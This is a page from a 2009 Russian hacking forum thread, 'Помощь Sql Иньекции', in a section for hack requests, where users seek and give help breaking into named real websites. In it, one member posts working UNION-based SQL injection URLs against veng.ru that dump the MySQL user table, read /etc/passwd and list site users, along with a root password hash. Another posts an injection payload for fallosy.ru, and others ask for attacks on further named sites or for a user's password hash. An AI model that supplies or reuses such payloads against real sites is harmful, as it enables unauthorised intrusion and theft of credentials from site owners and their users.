HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Просьбы о взломах
Перезагрузить страницу Помощь Sql Иньекции.
   
 
Страница 35 из 41 « Первая < 25 31 32 33 34 35 36 37 38 39 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #341  
Старый 21.03.2009, 07:10
srade
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию
Так и логика в чём, что сделать чтонить реально? вытащить то чтонить можно?
 

  #342  
Старый 21.03.2009, 22:43
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию
Цитата:
Сообщение от ILYAtirtir  
Вот что побыстрому нарыл:

4ая версия.


и

От сюда делаю вывод что юзер root,но даже доступа к mysql.user нету т.к. даже '1' не возвращает про file_priv и password вообще молчу.
хреновый ты вывод сделал. все есть..
Код:
http://veng.ru/player_info.php?name=%CC%E0%F0%F2%E8'+and+1=1+union+select+concat_ws(0x3a,user,password)+from+mysql.user/*
скуля с выводом:
Код:
http://veng.ru/index.php?page=blds&topic=plblds&bldcat=3+and+1=-1+union+select+load_file('/etc/passwd'),2,3,4,5,6,7,8,9,0,1
Код:
http://veng.ru/index.php?page=blds&topic=plblds&bldcat=3+and+1=-1+union+select+version(),2,3,4,5,6,7,8,9,concat_ws(0x3a,host,user,password),1+from+mysql.user+limit+0,1
root:*49821DE1D725212212ED39B160DC74A014191CCA
Код:
http://veng.ru/index.php?page=blds&topic=plblds&bldcat=3+and+1=-1+union+select+concat_ws(0x3a,id,username),2,3,4,5,6,7,8,9,0,1+from+users
+ phpbb3 там стоит, ищите название таблы/базы/префикса


Цитата:
Сообщение от srade  
Так и логика в чём, что сделать чтонить реально? вытащить то чтонить можно?
все реально, но логика в том, что у тебя ничего не выйдет, потому что ты не шаришь.
__________________
ПИУ-ПИУ...
Последний раз редактировалось c411k; 21.03.2009 в 22:50..
 

  #343  
Старый 22.03.2009, 06:06
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию
ну как я написал вывод сделан быстро проверив скулю) А про обход почему-то сразу не подумал. Скуля с выводом это хорошо,нормально выводит логин и пасс юзеров так что парниша почитай статейки чтоли,там вообще все элементарно темболее готовый разжованный линк на инъекцию дают.
 

  #344  
Старый 26.03.2009, 23:50
user777
Новичок
Регистрация: 25.02.2009
Сообщений: 4
Провел на форуме:
10495

Репутация: 0
По умолчанию
Можно встряну в разговор?
Интересует возможность иьнекта на этом ресурсе _http://muonline.by/
Есть ли он там ваабще? И что с него можно поиметь?
Да, обратите внимание на защиту сайта - Protected by MuOnline Anti Hack System
 

  #345  
Старый 09.04.2009, 17:31
joks
Познающий
Регистрация: 27.09.2008
Сообщений: 44
Провел на форуме:
289239

Репутация: 32
По умолчанию
хелп пипл

(не обращайте внимание на контент)

http://fallosy.ru/search.php?search=hell'

ни одной конструкции вставить не могу, все время выдает ошибку синтаксиса. В чем проблема? я много запросов перебробовал, просто интересно, почему он ни коммментарии не обрабатывает, ничего..

--
ошибку понял, помощь не требуется
Последний раз редактировалось joks; 10.04.2009 в 19:05..
 

  #346  
Старый 17.04.2009, 17:28
Nizhegorodets
Участник форума
Регистрация: 21.03.2009
Сообщений: 207
Провел на форуме:
554850

Репутация: 119
Отправить сообщение для Nizhegorodets с помощью ICQ
По умолчанию
Может пишу не в ту тему так что заранее извеняйте. Я только учусь...
вот нарыл что то
http://axepw.sytes.net/register/processor.php
выскакивает куча ошибок
вот например
Цитата:
Warning: mssql_connect() [function.mssql-connect]: WARNING! Some character(s) could not be converted into client's character set. Unconverted bytes were changed to question marks ('?'). (severity 16) in /opt/lampp/htdocs/register/processor.php on line 26
Можно ли что нить с этим сделать? Сам скрипт регистрирует новых пользователей на серваке...Кто нить может посмотреть?
 

  #347  
Старый 04.05.2009, 16:20
Swaty
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию
надо получить хеш пароля этого пользователя:


http://aggrnest.ru/forum/index.php?showuser=2

(IPB 2+ )


чтобы видеть профиль: Логин: test2 , пароль 123456


спасибо.
 

  #348  
Старый 04.05.2009, 16:31
LUKAC
Новичок
Регистрация: 19.08.2007
Сообщений: 18
Провел на форуме:
182410

Репутация: 8
По умолчанию
Swaty, тут помощь по скл инъекциям , а не доставание хэшов матушки тэрезы
 

  #349  
Старый 04.05.2009, 16:37
Swaty
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию
упс точно, извеняюсь
 

  #350  
Старый 08.05.2009, 11:21
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию
Цитата:
Сообщение от joks  
хелп пипл

(не обращайте внимание на контент)

http://fallosy.ru/search.php?search=hell'

ни одной конструкции вставить не могу, все время выдает ошибку синтаксиса. В чем проблема? я много запросов перебробовал, просто интересно, почему он ни коммментарии не обрабатывает, ничего..

--
ошибку понял, помощь не требуется


http://fallosy.ru/search.php?sea rch=h ell'/**/union/**/select/**/1,2 ,3,4,5,6,7,8+--+
 
 
Страница 35 из 41 « Первая < 25 31 32 33 34 35 36 37 38 39 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ